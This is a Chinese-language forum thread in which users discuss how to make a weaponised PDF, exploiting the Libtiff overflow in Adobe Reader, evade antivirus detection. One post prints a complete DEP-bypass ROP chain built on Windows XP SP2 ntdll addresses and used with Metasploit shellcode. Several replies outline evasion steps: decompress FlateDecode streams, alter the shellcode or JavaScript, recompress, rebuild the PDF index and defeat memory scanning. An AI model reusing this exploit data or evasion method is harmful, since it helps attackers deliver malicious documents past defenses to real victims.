能力值:
(RANK:860 )
|
-
-
2 楼
高深的东西,不懂
|
能力值:
( LV2,RANK:140 )
|
-
-
3 楼
把你自己改的贴上来看看。
|
能力值:
( LV6,RANK:90 )
在线值:
 
|
-
-
4 楼
仙果大牛,我看过你好几篇关于adobe漏洞的好文,请指点一下怎么做免杀。
PS:我是为了测试公司内部的安全防范,不是为了恶意利用。
|
能力值:
( LV6,RANK:90 )
在线值:
|
-
-
5 楼
主要是改了绕过DEP的栈数据,栈数据利用主要xpsp2的ntdll.dll中代码。
文件格式我就是改改长度和偏移之类的。
shellcode是metasploit中通用的,报的病毒类型非常准确,所以和shellcode应该没什么关系。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 | stack_data = [
0x00105092,
0x10124,
0x7C9013C3,
0x10104,
0x7C96BD42,
0x1000,
0x7C971977,
0x7C9013C3,
0x10100,
0x7C96BD42,
0x0,
0x7C971977,
0x7C90D4DE,
0x7C9013C3,
0xffffffff,
0x10100,
0x0,
0x10104,
0x1000,
0x40,
0x100FC,
0x7C939D3C,
0x7C96BD42,
0x26a525a,
0x7C951376,
0x77EA18DA,
0x77EA18DA,
0x7C96BD42,
0x3c2ecd58,
0x7C951376,
0x77EA18DA,
0x77EA18DA,
0x7C96BD42,
0xf4745a05,
0x7C951376,
0x77EA18DA,
0x77EA18DA,
0x7C96BD42,
0x2a4949b8,
0x7C951376,
0x77EA18DA,
0x77EA18DA,
0x7C96BD42,
0xaffa8b00,
0x7C951376,
0x77EA18DA,
0x77EA18DA,
0x7C96BD42,
0xfe87ea75,
0x7C951376,
0x77EA18DA,
0x77EA18DA,
0x7C96BD42,
0xb95f0aeb,
0x7C951376,
0x77EA18DA,
0x77EA18DA,
0x7C96BD42,
0x3e0,
0x7C951376,
0x77EA18DA,
0x77EA18DA,
0x7C96BD42,
0x9eba5f3,
0x7C951376,
0x77EA18DA,
0x77EA18DA,
0x7C96BD42,
0xfffff1e8,
0x7C951376,
0x77EA18DA,
0x77EA18DA,
0x7C96BD42,
0x909090ff,
0x7C951376,
0x77EA18DA,
0x77EA18DA,
0x7C96BD42,
0x90ffffff,
0x7C951376,
0x7C939D3C,
0x7C90EAC5
]
|
|
能力值:
(RANK:860 )
|
-
-
6 楼
还真不懂怎么做免杀,
没有做过
杀的话应该是文件格式有关吧,
|
能力值:
![]()
(RANK:250 )
|
-
-
7 楼
 你先找到特征码再才能做 ,直接这么大的一个文档分析 难办。
你把里面的JS 提取出来然后放到记事本 看杀软杀不杀,
|
能力值:
( LV2,RANK:140 )
|
-
-
8 楼
[QUOTE=pearkiller;882136]主要是改了绕过DEP的栈数据,栈数据利用主要xpsp2的ntdll.dll中代码。
文件格式我就是改改长度和偏移之类的。
shellcode是metasploit中通用的,报的病毒类型非常准确,所以和shellcode应该没什么关系。
stack_data = [
#构造过程
...[/QUOTE]
我的意思是放你做好的pdf,也就是所谓的样本。
|
能力值:
( LV4,RANK:50 )
在线值:
|
-
-
9 楼
回楼主:
某些杀软通过你修改的(1),(2),(3)部分的特征加权,判断是否恶意。
私认为对于Libtiff漏洞,杀毒软件可以直接检查流中是否包含Tiff,然后检查Tiff中的溢出字段,若为非正常数据,报毒,如果是这样查杀,那么该漏洞基本无免杀可能性。
|
能力值:
( LV6,RANK:90 )
在线值:
|
-
-
10 楼
如果真的像你猜测的这样,那可能真的没有免杀方法了。
但是我觉得如果针对一种病毒,病毒库里的数据应该不会太多。如果去解码pdf,提取出tiff,再解释tiff,这个工作量很大啊。还有杀软自己涉及到具体文件格式的话,它又如何保证自己解析的没有漏洞呢?
并且,文件格式太多了,还有些事私用格式呢。doc格式,wps格式,邮件格式,zip格式什么的每种病毒都要解析,杀毒软件能受得了吗?
哪里有杀软杀文件格式类漏洞的文档可以参考学习一下吗? TO nkspark:
我的网络,不能上传文件 
|
能力值:
( LV4,RANK:50 )
在线值:
|
-
-
11 楼
我只是指Libtiff溢出这个漏洞。
你看一下,你都能直接在Tiff图片二进制里面轻松的定位到溢出参数,然后修改长度和偏移。
杀毒软件只是把这个过程自动化了嘛。
对于你后面说的那些格式,确实杀毒软件不能够做到一一解析,大部分还是通过某些特征来判断的,所以免杀某
些文档是可能的,例如MS07-014,现在都有能过的。
PS:你说的那些文档,我没有见过。
|
能力值:
( LV6,RANK:90 )
在线值:
|
-
-
12 楼
tiff嵌入到pdf中,再找到tiff的溢出点就没那么方便了,需要先Zlib:Inflate.inflate然后从解出来的xml中把tiff标签抠出来,再把tiff数据解码出来,然后才能去找他的溢出点。 
请问pende大侠,ms07-014做免杀的思路是什么呢?
|
能力值:
( LV2,RANK:150 )
在线值:
|
-
-
14 楼
以我自己的测试看,norton对tiff文件的格式进行了解析,所以当长度字节超过特定值时即认为是恶意文档。
这个洞,应该已经是被查死了。
|
能力值:
( LV2,RANK:10 )
在线值:
|
-
-
15 楼
1.Symantec报文件有问题还是执行时报病毒。估计是直接报文件。
2.如果是文件,看看是不是shellcode的问题。可能不是。
3.如果是利用文件的格式有问题,改文件格式;如果是shellcode,改shellcode
|
能力值:
( LV2,RANK:10 )
|
-
-
16 楼
首现改JS,确保JS不被杀。
|
能力值:
( LV2,RANK:10 )
在线值:
|
-
-
17 楼
1111111111111
|
能力值:
( LV2,RANK:10 )
|
-
-
18 楼
具体嗲呢?不是太清楚
|
能力值:
( LV2,RANK:10 )
在线值:
|
-
-
19 楼
最近也在修改一个PDF,但是没有找到什么方法呢,只知道是流对象中FlateDecode这里面的问题。希望有高手给点意见。
|
能力值:
( LV2,RANK:10 )
在线值:
|
-
-
20 楼
把FlateDecode解开就是了,杀哪改哪,改完压回去,对PDF过杀软不是很难
|
能力值:
( LV2,RANK:10 )
|
-
-
21 楼
需要规避杀软的特征查杀和内存查杀的,特征查杀好办,JS有特别灵活的变形方法。内存查杀和PE反调试很相似,需要利用杀软的内存查杀机制让杀软傻掉。
|
能力值:
( LV2,RANK:10 )
在线值:
|
-
-
22 楼
1、首先判断是否是杀机制,如果是,没什么太大办法;
2、如果不是,把压缩部分解压,可以用VC + ZLIB的办法;
3、用OD定位到SHELLCODE,做少量变形;
4、压缩回去;
5、重新修改PDF的索引表;
|
能力值:
( LV2,RANK:10 )
|
-
-
23 楼
[QUOTE=Rolbinal;896251]需要规避杀软的特征查杀和内存查杀的,特征查杀好办,JS有特别灵活的变形方法。 内存查杀和PE反调试很相似,需要利用杀软的内存查杀机制让杀软傻掉。[/QUOTE]
我刚看到这句话,球细节?!@
|
能力值:
( LV2,RANK:10 )
在线值:
|
-
-
24 楼
不行的,这个是直接分析了格式,整个漏洞都被堵死了
|
能力值:
( LV8,RANK:135 )
|
-
-
25 楼
你尝试着去做一下免杀,再确定到底是哪个地方被杀...
|
